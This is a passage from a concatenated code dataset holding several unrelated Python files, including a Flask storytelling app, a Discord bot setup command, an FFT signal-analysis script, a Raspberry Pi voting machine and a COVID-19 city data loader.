price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r != records[4]:\n writer.writerow(r)\n\nwith open('properties1.csv', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(row['name'], row['lease price'], row['city'])\n\nwith open(f'properties2.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r != records[3]:\n writer.writerow(r)\n\nwith open(f'properties3.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r == records[5]:\n r['city'] = f'{fake.city()}'\n writer.writerow(r)\n else:\n writer.writerow(r)\n\nwith open(f'properties4.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n writer.writeheader()\n for r in records:\n if r != records[5]:\n if r == records[2]:\n r['lease price'] = f'{fake.random_int(min=100, max=999, step=1)} $'\n writer.writerow(r)\n else:\n writer.writerow(r)\n \n\n\n","sub_path":"zapisproperties.py","file_name":"zapisproperties.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"463293622","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models.fields.files import ImageFieldFile\nfrom django.utils.html import format_html\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom easy_thumbnails.exceptions import EasyThumbnailsError\nfrom easy_thumbnails.files import get_thumbnailer\n\n\nclass ImageMixin(models.Model):\n image_field = 'image'\n image_size = (70, 40)\n\n def image_thumb(self):\n image = getattr(self, self.image_field)\n if image and not isinstance(image, ImageFieldFile):\n return format_html('\"\"' % (\n image.url, self.image_size[0], self.image_size[1]\n ))\n else:\n try:\n return format_html(\n '\"\"' % get_thumbnailer(\n getattr(self, self.image_field)\n ).get_thumbnail({\n 'size': self.image_size,\n 'detail': True,\n }).url if image else '\"\"' % (\n settings.STATIC_URL, self.image_size[0], self.image_size[1]\n )\n )\n except (OSError, EasyThumbnailsError):\n return ''\n\n image_thumb.short_description = _('Изображение')\n\n class Meta:\n abstract = True\n","sub_path":"snippets/models/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192236241","text":"# Const\nN = 1024 * 2**8\ndelta_T = 1/1000\n\nA0 = 2\nA1 = 3\nA2 = 100\n\nf0 = 153.6849819\nf1 = 204.1683416\nf2 = 249.83384134\n\ndef calculate_phase_spectrum(complex_spectrum):\n \"\"\"\n :complex_spectrum: коплексный спектр сигнала\n :returns: фазовый спектр сигнала\n \"\"\"\n import cmath as cm\n\n phase_spectrum = []\n for scalar in complex_spectrum:\n phase_spectrum.append(cm.phase(scalar))\n\n return phase_spectrum\n\ndef low_resolution_window_function(step_number):\n \"\"\"\n :step_number: количество отсчётов\n :returns: окно низкого разрешения \n \"\"\"\n import numpy as np\n\n low_resolution_window = []\n for n in range(0, step_number):\n low_resolution_window.append(np.exp(-(1/2) * ((n - (N/2))/(0.5 * (N/2)))**2))\n \n return low_resolution_window\n\ndef high_resolution_window_function(step_number):\n \"\"\"\n :step_number: количество отсчётов\n :returns: окно высокого разрешения\n \"\"\"\n import numpy as np\n\n high_resolution_window = []\n for n in range(0, step_number):\n high_resolution_window.append(np.sin((np.pi * n)/N))\n\n return high_resolution_window\n\ndef signal_plot(input_signal):\n \"\"\"\n Строит гарфик сигнала, вычисляет спектры сигнала с заданными оконными функциями\n\n :input_signal: входной сигнал(дискретный)\n \"\"\"\n import numpy as np\n import cmath as cm\n import matplotlib.pyplot as plt\n import scipy.fftpack as fp\n from scipy.signal import find_peaks\n\n # Вычисляем частоту\n k = np.linspace(0, N/2, N/2)\n frequency = k/(N * delta_T)\n\n # Строим график дискритизированного сигнала\n signal_window = plt.figure()\n signal_ax = signal_window.add_subplot(111)\n signal_ax.plot(range(0, len(input_signal)), input_signal)\n signal_ax.set_title(\"Дискритизированный сигнал\")\n signal_ax.set_xlabel(\"Частота, Гц\")\n signal_ax.set_ylabel(\"Амплитуда, В\")\n\n # Вычисляем амплитудный спектр из БПФ сигнала и строим его график\n fft_sd = fp.fft(input_signal)\n fft_spectrum_window = plt.figure()\n fft_amplitude_spectrum_ax = fft_spectrum_window.add_subplot(211)\n fft_amplitude_spectrum_ax.set_xscale('log')\n fft_amplitude_spectrum_ax.plot(frequency, 20 * np.log10(abs(fft_sd[:len(k)])))\n fft_amplitude_spectrum_ax.set_title(\"Амплитудный спектр сигнала\")\n fft_amplitude_spectrum_ax.set_xlabel(\"Частота, Гц\")\n fft_amplitude_spectrum_ax.set_ylabel(\"Амплитуда, В\")\n print(frequency[find_peaks(abs(fft_sd[:len(k)]))[0][:]])\n print(frequency[1]-frequency[0])\n \n # Вычисляем фазовый спектр из БПФ сигнала и строим его график\n fft_phase_spectrum = calculate_phase_spectrum(fft_sd)\n fft_phase_spectrum_ax = fft_spectrum_window.add_subplot(212)\n fft_phase_spectrum_ax.plot(frequency, fft_phase_spectrum[:len(k)])\n fft_phase_spectrum_ax.set_title(\"Фазовый спектр сигнала\")\n fft_phase_spectrum_ax.set_xlabel(\"Частота, Гц\")\n fft_phase_spectrum_ax.set_ylabel(\"Фаза, рад\")\n\n # Вычисляем амплитудный спектр сигнала с применением оконной функции низкого разрешения и строим график\n lrw = low_resolution_window_function(N)\n low_res_win_spectrum_window = plt.figure()\n low_res_win_amplitude_spectrum_ax = low_res_win_spectrum_window.add_subplot(211)\n low_res_win_amplitude_spectrum_ax.set_xscale('log')\n low_res_win_amplitude_spectrum_ax.plot(frequency, 20 * np.log10((abs(fp.fft(lrw * input_signal)))[:len(k)]))\n low_res_win_amplitude_spectrum_ax.set_title(\"Амплитудный спектр сигнала\")\n low_res_win_amplitude_spectrum_ax.set_xlabel(\"Частота, Гц\")\n low_res_win_amplitude_spectrum_ax.set_ylabel(\"Амплитуда, В\")\n\n # Вычисляем фазовый спектр сигнала с применение оконной функции низкого разрешения и строим график\n low_res_win_phase_spectrum = calculate_phase_spectrum(fp.fft(lrw * input_signal))\n low_res_win_phase_spectrum_ax = low_res_win_spectrum_window.add_subplot(212)\n low_res_win_phase_spectrum_ax.plot(frequency, low_res_win_phase_spectrum[:len(k)])\n low_res_win_phase_spectrum_ax.set_title(\"Фазовый спектр сигнала\")\n low_res_win_phase_spectrum_ax.set_xlabel(\"Частота, Гц\")\n low_res_win_phase_spectrum_ax.set_ylabel(\"Фаза, рад\")\n\n # Вычисляем амплитудный спектр сигнала с применением оконной функции высокого разрешения и строим график\n hrw = high_resolution_window_function(N)\n high_res_win_spectrum_window = plt.figure()\n high_res_win_amplitude_spectrum_ax = high_res_win_spectrum_window.add_subplot(211)\n high_res_win_amplitude_spectrum_ax.set_xscale('log')\n high_res_win_amplitude_spectrum_ax.plot(frequency, 20 * np.log10((abs(fp.fft(hrw * input_signal)))[:len(k)]))\n high_res_win_amplitude_spectrum_ax.set_title(\"Амплитудный спектр сигнала\")\n high_res_win_amplitude_spectrum_ax.set_xlabel(\"Частота, Гц\")\n high_res_win_amplitude_spectrum_ax.set_ylabel(\"Амплитуда, В\")\n\n # Вычисляем фазовый спектр сигнала с применение оконной функции низкого разрешения и строим график\n high_res_win_phase_spectrum = calculate_phase_spectrum(fp.fft(hrw * input_signal))\n high_res_win_phase_spectrum_ax = high_res_win_spectrum_window.add_subplot(212)\n high_res_win_phase_spectrum_ax.plot(frequency, high_res_win_phase_spectrum[:len(k)])\n high_res_win_phase_spectrum_ax.set_title(\"Фазовый спектр сигнала\")\n high_res_win_phase_spectrum_ax.set_xlabel(\"Частота, Гц\")\n high_res_win_phase_spectrum_ax.set_ylabel(\"Фаза, рад\")\n\n # Добавляю пространство между графиками\n signal_window.tight_layout()\n fft_spectrum_window.tight_layout()\n low_res_win_spectrum_window.tight_layout()\n high_res_win_spectrum_window.tight_layout()\n\ndef signal(time):\n \"\"\" \n Генерирует сигнал с заданными параметрами\n\n :time: отсчёты по х-оси\n :returns: сигнал с заданными параметрами\n \"\"\"\n import numpy as np\n\n input_signal = A0 * np.sin(2 * np.pi * f0 * time + 2*np.pi/3) + A1 * np.sin(2 * np.pi * f1 * time + np.pi/3) + A2 * np.sin(2 * np.pi * f2 * time + np.pi/4)\n\n return input_signal \n\ndef main():\n import numpy as np\n import matplotlib.pyplot as plt\n\n n = np.linspace(0, N - 1, N)\n sd = signal(n * delta_T) \n\n signal_plot(sd)\n #signal_plot(sd + np.random.normal(0.05, 0.05, len(sd)))\n\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MetUstrCifrObr/1sem/practika/prac2/prac2_for_play.py","file_name":"prac2_for_play.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"264604292","text":"import chainer\nimport chainer.links as L\nimport chainer.functions as F\nimport numpy as np\nimport cv2\n\nfrom src.utils.datasets import ImageNetClassID\n\n\ndef get_heatmap(model, image, classids, rank=0):\n with chainer.using_config('train', False):\n pred = model.prepare_cam(image)\n target_class = np.argsort(F.softmax(pred)[0].array)[::-1][rank]\n signal = np.zeros_like(pred).astype('f')\n signal[0, target_class] = 1\n pred.grad = signal\n pred.backward()\n\n map_weights = _global_average_pooling_2d(model.target.grad)\n activations = model.target\n\n grad_cams = map_weights * activations\n grad_cam = F.relu(F.sum(grad_cams, axis=1))[0]\n grad_cam = cv2.resize(grad_cam.array, image.shape[2:])\n heatmap = (grad_cam / np.max(grad_cam)) * 255\n heatmap = cv2.applyColorMap(np.uint8(heatmap), cv2.COLORMAP_JET)[:, :, ::-1]\n\n return heatmap, classids[target_class]\n\n\ndef get_heatmap_imagenet(model, image, classids=ImageNetClassID, rank=0):\n x = L.model.vision.vgg.prepare(image)\n x = chainer.Variable(np.array([x]).astype('f'))\n return get_heatmap(model, x, classids=ImageNetClassID, rank=0)\n\n\ndef _global_average_pooling_2d(maps):\n return F.average_pooling_2d(maps, maps.shape[2:])\n","sub_path":"src/utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"474902386","text":"import RPi.GPIO as GPIO\nfrom gpiozero import LED\nimport time\nGPIO.setmode(GPIO.BCM)\n\nstate = 0\nno_of_pos = 0\npos = {}\nlight1 =18\nlight2 = 22\nlight3 = 23\nstart_button = 4\nresult_button = 20\nbutton1 = 6\nbutton2 = 12\nbutton3 = 13\n\nGPIO.setup(light1,GPIO.OUT)\nGPIO.setup(light2,GPIO.OUT)\nGPIO.setup(light3,GPIO.OUT)\nGPIO.setup(start_button,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(result_button,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button1,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button2,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(button3,GPIO.IN,pull_up_down=GPIO.PUD_UP)\n\ndef showLight(st): \n if st == 0:\n GPIO.output(light1,GPIO.LOW)\n GPIO.output(light2,GPIO.LOW)\n GPIO.output(light3,GPIO.LOW)\n \n elif st == 1:\n GPIO.output(light1,GPIO.HIGH)\n GPIO.output(light2,GPIO.HIGH)\n GPIO.output(light3,GPIO.HIGH)\n \n\ndef setupMachine():\n global state\n\n no_of_pos = int(raw_input(\"Enter no. of positions:\"))\n for i in range(no_of_pos):\n name = raw_input(\"Enter position name (max 12 char long):\")\n can = int(raw_input(\"Enter no. of candidates:\"))\n can_list = {}\n for j in range(can):\n can_name = raw_input(\"Enter name of candidate no. \" + str(j + 1) + \":\")\n can_list[j] = can_name\n pos[name] = can_list \n state = 1\n print(state)\n print(\"Setup successful\")\n \nclass startForOnePerson:\n def _init_(self):\n print (\"starting...\")\n self.setText(\"Starting...\")\n time.sleep (1)\n \n for pos_name, can_list in pos.iteritems():\n #print position name in first row\n line1 = \"\"\n line2 = \"\"\n line3 = \"\"\n \n line1 += pos_name \n #print candidates in second row\n for can in can_list.keys():\n line2 += can + \" \"\n self.setText(line1 + \"\\n\" + line2 + \"\\n\" + line3)\n time.sleep(0.5)\n\n showLight(1)\n while True:\n input1 = GPIO.input(button1)\n input2 = GPIO.input(button2)\n input3 = GPIO.input(button3)\n\n if input1 == False:\n pos[pos_name][can_list.keys()[0]] += 1\n line1 += \" \" + can_list.keys()[0]\n time.sleep(2)\n print(\"vote to 1\")\n break\n elif input2 == False:\n pos[pos_name][can_list.keys()[1]] += 1\n line1 += \" \" + can_list.keys()[1]\n time.sleep(2)\n print(\"vote to 2\")\n setText(line1 + \"\\n\" + line2)\n showLight(0) \n time.sleep(2) \n print (\"vote recorded\")\n\ndef printResult():\n print (\"Showing result:\")\n\n line1 = \"Showing result\" \n for pos_name, can_list in pos.iteritems():\n mx = -1\n line2 = \"\"\n for x , y in can_list.iteritems():\n if y > mx:\n mx=y\n for x , y in can_list.iteritems():\n if y == mx:\n line2 += x + \" \"\n setText(line1 + \"\\n\" + line2)\n time.sleep(3)\n \ndef startMachine():\n global state\n while True:\n start = GPIO.input(start_button)\n res = GPIO.input(result_button)\n if start == False:\n time.sleep(2)\n if state == 0: \n setupMachine()\n print(state)\n elif state == 1:\n startForOnePerson(self)\n \n elif res == False:\n time.sleep(2)\n printResult()\n break\n \n \n \nsetupMachine()\nstartMachine()\n","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410280769","text":"import openpyxl\nwb = openpyxl.Workbook()\nsheet = wb.active\n# sheet['A1'] = 200\n# sheet['A2'] = 300\n# sheet['A3'] = '=SUM(A1:A2)'\n\nsheet['C1'] = \"Tall row\"\nsheet['D1'] = 'Wide column'\n\nsheet.row_dimensions[1].height = 70\nsheet.column_dimensions['D'].width = 20\n\n# wb.save(\"writeFormula.xlsx\")\nwb.save(\"dimensions.xlsx\")","sub_path":"work_with_excel_sheet/write_formula.py","file_name":"write_formula.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"623874362","text":"\n# array = [1, 3, 5, 7, 9]\n# for x in array:\n# print(x)\n# for (i, x) in enumerate(array):\n# print(i, x)\n\ncounter = 100\nwhile counter > 10:\n print(counter)\n counter = counter - 1\n\n","sub_path":"test04_loop.py","file_name":"test04_loop.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73143408","text":"from __future__ import print_function\r\n\r\nfrom sys import stderr\r\n\r\n__authors__ = ['Khyber Sen', 'Caleb Smith-Salzburg', 'Michael Ruvinshteyn', 'Terry Guan']\r\n__date__ = '2017-10-30'\r\n\r\nfrom typing import Callable\r\nimport os\r\n\r\nfrom flask import \\\r\n Flask, \\\r\n render_template, \\\r\n request, \\\r\n flash, \\\r\n session, \\\r\n Response\r\n\r\nfrom werkzeug.datastructures import ImmutableMultiDict\r\n\r\nfrom util.flask_utils_types import \\\r\n Router, \\\r\n Precondition\r\n\r\nfrom util.flask_utils import \\\r\n preconditions, \\\r\n post_only, \\\r\n reroute_to, \\\r\n form_contains, \\\r\n session_contains, \\\r\n bind_args\r\n\r\nfrom util.template_context import add_template_context\r\nfrom util.flask_json import use_named_tuple_json\r\n\r\nfrom storytelling_db import \\\r\n StoryTellingDatabase, \\\r\n User, \\\r\n Story, \\\r\n Edit, \\\r\n StoryTellingException\r\n\r\napp = Flask(__name__)\r\n\r\ndb = StoryTellingDatabase()\r\n\r\n\"\"\"Keys in session.\"\"\"\r\nUSER_KEY = 'user'\r\nSTORY_KEY = 'story'\r\nEDIT_KEY = 'edit'\r\nIS_NEW_STORY_KEY = 'is_new_story'\r\n\r\n\r\ndef get_user():\r\n # type: () -> User\r\n \"\"\"Get User in session.\"\"\"\r\n return session[USER_KEY]\r\n\r\n\r\ndef get_story():\r\n # type: () -> Story\r\n \"\"\"Get Story in session.\"\"\"\r\n return session[STORY_KEY]\r\n\r\n\r\ndef pop_is_new_story():\r\n # type: () -> bool\r\n \"\"\"Pop is new story from session.\"\"\"\r\n return session.pop(IS_NEW_STORY_KEY)\r\n\r\n\r\ndef pop_story():\r\n # type: () -> Story\r\n \"\"\"Pop Story from session.\"\"\"\r\n return session.pop(STORY_KEY)\r\n\r\n\r\ndef pop_edit():\r\n # type: () -> Edit\r\n \"\"\"Pop Edit from session.\"\"\"\r\n return session.pop(EDIT_KEY)\r\n\r\n\r\nis_logged_in = session_contains(USER_KEY) # type: Precondition\r\nis_logged_in.func_name = 'is_logged_in'\r\n\r\n\r\n@app.reroute_from('/')\r\n@app.route('/welcome')\r\ndef welcome():\r\n # type: () -> Response\r\n return render_template('welcome.jinja2', is_loggin_in=is_logged_in())\r\n\r\n\r\ndef get_user_info():\r\n # type: () -> (str, str)\r\n \"\"\"Get username and password from request.form.\"\"\"\r\n form = request.form # type: ImmutableMultiDict\r\n return form['username'], form['password']\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n # type: () -> Response\r\n if is_logged_in():\r\n return reroute_to(home)\r\n return render_template('login.jinja2')\r\n\r\n\r\n@preconditions(login, post_only, form_contains('username', 'password'))\r\ndef auth_or_signup(db_user_supplier):\r\n # type: (Callable[[unicode, unicode], User]) -> Response\r\n if is_logged_in():\r\n reroute_to(home)\r\n username, password = get_user_info()\r\n with db:\r\n try:\r\n user = db_user_supplier(username, password)\r\n except StoryTellingException as e:\r\n flash(e.message)\r\n print(e, file=stderr)\r\n return reroute_to(login)\r\n\r\n session[USER_KEY] = user\r\n return reroute_to(home)\r\n\r\n\r\n@app.route('/signup', methods=['getNullable', 'post'])\r\ndef signup():\r\n # type: () -> Response\r\n return auth_or_signup(db.add_user)\r\n\r\n\r\n\"\"\"Precondition decorator rerouting to login if is_logged_in isn't True.\"\"\"\r\nlogged_in = preconditions(login, is_logged_in) # type: Router\r\n\r\n\r\n@app.route('/auth', methods=['getNullable', 'post'])\r\ndef auth():\r\n # type: () -> Response\r\n \"\"\"\r\n Authorize and login a User with username and password from POST form.\r\n If username and password is wrong, flash message raised by db.\r\n \"\"\"\r\n return auth_or_signup(db.get_user)\r\n\r\n\r\n@app.route('/home')\r\n@logged_in\r\ndef home():\r\n # type: () -> Response\r\n \"\"\"Display a User's home page with all of his edited and unedited Stories.\"\"\"\r\n user = get_user()\r\n with db:\r\n return render_template('home.jinja2',\r\n user=user,\r\n edited_stories=sorted(db.get_edited_stories(user)),\r\n unedited_stories=sorted(db.get_unedited_stories(user)),\r\n )\r\n\r\n\r\n@app.route('/story', methods=['getNullable', 'post'])\r\n@logged_in\r\n@preconditions(home, post_only, form_contains('story'))\r\ndef read_or_edit_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Open Story specified through form for either reading or editing,\r\n depending on if the User has edited the Story yet.\r\n\r\n If the story_id, storyname pair cannot be verified,\r\n reroute to home.\r\n \"\"\"\r\n storyname = request.form['story']\r\n\r\n with db:\r\n try:\r\n story = db.get_story(storyname)\r\n except StoryTellingException as e:\r\n flash(e.message)\r\n print(e, file=stderr)\r\n return reroute_to(home)\r\n\r\n session[STORY_KEY] = story\r\n editing = db.can_edit(story, get_user())\r\n if editing:\r\n return render_template('edit_story.jinja2',\r\n last_edit=db.get_last_edit(story))\r\n else:\r\n return render_template('read_story.jinja2',\r\n edits=sorted(db.get_edits(story), key=Edit.order))\r\n\r\n\r\n@app.route('/edit', methods=['getNullable', 'post'])\r\n@logged_in\r\n@preconditions(read_or_edit_story, post_only,\r\n session_contains(STORY_KEY), form_contains('text'))\r\ndef edit_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Edit the Story the User already selected with the text passed through the POST form.\r\n Reroute to edited_story to display post-edit page, passing Edit and not is_new_story.\r\n\r\n Check again if User can edit the Story. If not, reroute to home.\r\n \"\"\"\r\n\r\n story = get_story()\r\n user = get_user()\r\n\r\n with db:\r\n if not db.can_edit(story, user):\r\n return reroute_to(home)\r\n\r\n text = request.form['text']\r\n with db:\r\n edit = db.edit_story(story, user, text)\r\n return reroute_to(edited_story, pop_story(), edit, False)\r\n\r\n\r\n@app.route('/create_new_story')\r\n@logged_in\r\ndef create_new_story():\r\n # type: () -> Response\r\n return render_template('create_new_story.jinja2')\r\n\r\n\r\n@app.route('/new_story', methods=['getNullable', 'post'])\r\n@logged_in\r\n@preconditions(create_new_story, post_only, form_contains('storyname', 'text'))\r\ndef add_new_story():\r\n # type: () -> Response\r\n \"\"\"\r\n Add the new Story created by the User\r\n with the storyname and initial text passed through the POST form.\r\n Reroute to edited_story display post-creation page\r\n with Story, Edit, and is_new_story passed through session.\r\n\r\n If storyname already exists, reroute to create_new_story with flash.\r\n \"\"\"\r\n\r\n storyname = request.form['storyname']\r\n\r\n with db:\r\n if db.story_exists(storyname):\r\n flash('The story \"{}\" already exists'.format(storyname))\r\n return reroute_to(create_new_story)\r\n\r\n text = request.form['text']\r\n with db:\r\n story, edit = db.add_story(storyname, get_user(), text)\r\n\r\n return reroute_to(edited_story, story, edit, True)\r\n\r\n\r\n@app.route('/edited_story', methods=['getNullable', 'post'])\r\n@logged_in\r\n@preconditions(home, lambda: False)\r\n@bind_args(home)\r\ndef edited_story(story, edit, is_new_story):\r\n # type: (Story, Edit, bool) -> Response\r\n \"\"\"Display post-edit or post-creation page for given Story, Edit, and is_new_story.\"\"\"\r\n return render_template('edited_story.jinja2',\r\n story=story,\r\n edit=edit,\r\n is_new_story=is_new_story)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n # type: () -> Response\r\n del session[USER_KEY]\r\n return reroute_to(welcome)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.debug = True\r\n app.secret_key = os.urandom(32)\r\n add_template_context(app)\r\n use_named_tuple_json(app)\r\n app.run()\r\n","sub_path":"StoryTellingGame/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"455792088","text":"import asyncio\n\nimport discord\n\nfrom commands import _mongoFunctions, _embedMessage, _util\n\n# How long to wait for user response before timeout\nwait_timeout = 60.0\n\n\nasync def setup_announcement(ctx: discord.Message, client: discord.Client):\n stop_embed = _embedMessage.create(\"SetupAnnouncement Reply\", \"Setup Stopped\", \"green\")\n\n # Checks if user is admin or bot owner\n if not (ctx.author.guild_permissions.administrator or _util.author_is_bot_owner(ctx)):\n await ctx.channel.send(embed = _embedMessage.create(\"SetupAnnouncement Reply\", \"Invalid Permissions\", \"red\"))\n return\n\n try:\n _mongoFunctions.get_guilds_information()[str(ctx.guild.id)]\n except KeyError:\n _mongoFunctions.generate_default_settings(ctx.guild.id)\n\n # Checking function to determine if responses are sent by initial user in initial channel\n def check(message):\n return message.author == ctx.author and message.channel == ctx.channel\n\n response_message = await ctx.channel.send(embed = _embedMessage.create(\"Setup Reply\", \"Should Morning Announcements be Enabled (y/n)?\", \"blue\"))\n\n await set_settings(ctx, client, response_message, stop_embed, check)\n\n await ctx.channel.send(embed = _embedMessage.create(\"Setup Reply\", \"Announcement Setup has been Completed\", \"blue\"))\n\n\nasync def set_settings(ctx: discord.Message, client: discord.Client, response_message: discord.Message, stop_embed: discord.embeds, check):\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Should Morning Announcements be Enabled (y/n)?\", \"blue\"))\n try:\n morning_announcements_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n morning_announcements_string = morning_announcements_message.content.lower()\n if morning_announcements_string == 'next':\n break\n if morning_announcements_string == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n if morning_announcements_string in ('yes', 'y', 'true', 't', '1', 'enable', 'on'):\n _mongoFunctions.update_setting(ctx.guild.id, \"morning_announcements_enabled\", True)\n else:\n _mongoFunctions.update_setting(ctx.guild.id, \"morning_announcements_enabled\", False)\n\n break\n\n await asyncio.sleep(0.5)\n\n if _mongoFunctions.get_settings(ctx.guild.id)[\"morning_announcements_enabled\"]:\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"What is the morning announcement channel?\", \"blue\"))\n try:\n announcement_channel_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_channel_string = announcement_channel_message.content\n if announcement_channel_string.lower() == 'next':\n break\n if announcement_channel_string.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n announcement_channel_id = discord.utils.get(ctx.guild.channels, mention = announcement_channel_string).id\n _mongoFunctions.update_setting(ctx.guild.id, \"announcement_channel_id\", announcement_channel_id)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"What is the morning announcement time (HH:MM)?\", \"blue\"))\n try:\n announcement_time_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_time_string = announcement_time_message.content\n if announcement_time_string.lower() == 'next':\n break\n if announcement_time_string.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n _mongoFunctions.update_setting(ctx.guild.id, \"announcement_time\", announcement_time_string)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Should the quote be random (y/n)?\", \"blue\"))\n try:\n random_quote_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n random_quote_string = random_quote_message.content.lower()\n if random_quote_string == 'next':\n break\n if random_quote_string == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n if random_quote_string in ('yes', 'y', 'true', 't', '1', 'enable', 'on'):\n _mongoFunctions.update_setting(ctx.guild.id, \"random_quote\", True)\n else:\n _mongoFunctions.update_setting(ctx.guild.id, \"random_quote\", False)\n break\n\n while True:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"Who should be quoted in the morning announcement?\", \"blue\"))\n try:\n announcement_quoted_person_message = await client.wait_for('message', timeout = wait_timeout, check = check)\n except asyncio.TimeoutError:\n await response_message.edit(embed = _embedMessage.create(\"Setup Reply\", \"You took too long to respond.\", \"red\"))\n return\n else:\n announcement_quoted_person = announcement_quoted_person_message.content\n if announcement_quoted_person.lower() == 'next':\n break\n if announcement_quoted_person.lower() == 'stop':\n await ctx.channel.send(embed = stop_embed)\n return\n _mongoFunctions.update_setting(ctx.guild.id, \"announcement_quoted_person\", announcement_quoted_person)\n break\n","sub_path":"commands/setupannouncement.py","file_name":"setupannouncement.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144497350","text":"# Author: Luke LaCasse\n# Date: October 1, 2020\n# Title: ECE 241 Project 1: Sorting and Searching\n# Description:\n\nfrom BinarySearchTree import *\n#from time import time_ns\n#from random import randint\n\nclass City:\n\n def __init__(self, cid, cname, cstate, pop, cities):\n self.cid = cid\n self.cname = cname\n self.cstate = cstate\n self.pop = pop\n self.cities = cities\n\n def __str__(self):\n return (\"cid: %s; cname: %s; cstate: %s; cases:%s\" % (self. cid, self.cname, self.cstate, self.cities)).rstrip(\"\\n\")\n\n\nclass COV19Library:\n\n def __init__(self):\n self.cityArray = []\n self.size = 0\n self.isSorted = False\n self.BST = None\n self.root = None\n\n def LoadData(self, filename):\n file = open(filename, \"r\") # open csv file as read-only\n file.readline() # skip first line\n while True:\n cindex = [] # keeps track of comma indexes per line\n index = 0\n line = file.readline() # read line of the input file\n for char in line: # sort through the line character by character\n if char == ',': cindex.append(index) # add index to location to cindex if ',' is found\n index += 1\n if len(cindex) == 0: break\n citsta = str.split(line[cindex[0] + 1 : cindex[1]]) # splits city and state field by space into array of string\n stindex = len(citsta) - 1 # index of state name\n stateName = citsta[stindex] # Store state name\n if len(citsta) == 1: # Deals with cities with no state name\n citName = citsta[0]\n else:\n citName = line[cindex[0] + 1: cindex[1] - (len(stateName) + 1)] # Format City Name\n dlen = len(line) - len(line[cindex[3] + 1: cindex[len(cindex) - 1]]) # how many characters are left after the last comma\n temp = City(line[0:cindex[0]], citName, stateName, line[cindex[2] + 1: cindex[3]], line[cindex[len(cindex) - 1] + 1 : cindex[len(cindex) - 1] + dlen]) # line[cindex[3] + 1: cindex[len(cindex) - 1] + dlen])\n self.cityArray.append(temp)\n self.size = len(self.cityArray)\n\n def linearSearch(self, city, attribute):\n for tempcity in self.cityArray:\n if attribute == \"id\":\n if tempcity.cid == city:\n return str(tempcity)\n elif attribute == \"name\":\n if tempcity.cname == city:\n return str(tempcity)\n return \"City not found\"\n\n def quickSort(self):\n self.quickSortHelper(0,len(self.cityArray) - 1)\n self.isSorted = True\n\n def quickSortHelper(self, first, last):\n if first < last:\n splitpoint = self.partition(first, last)\n\n 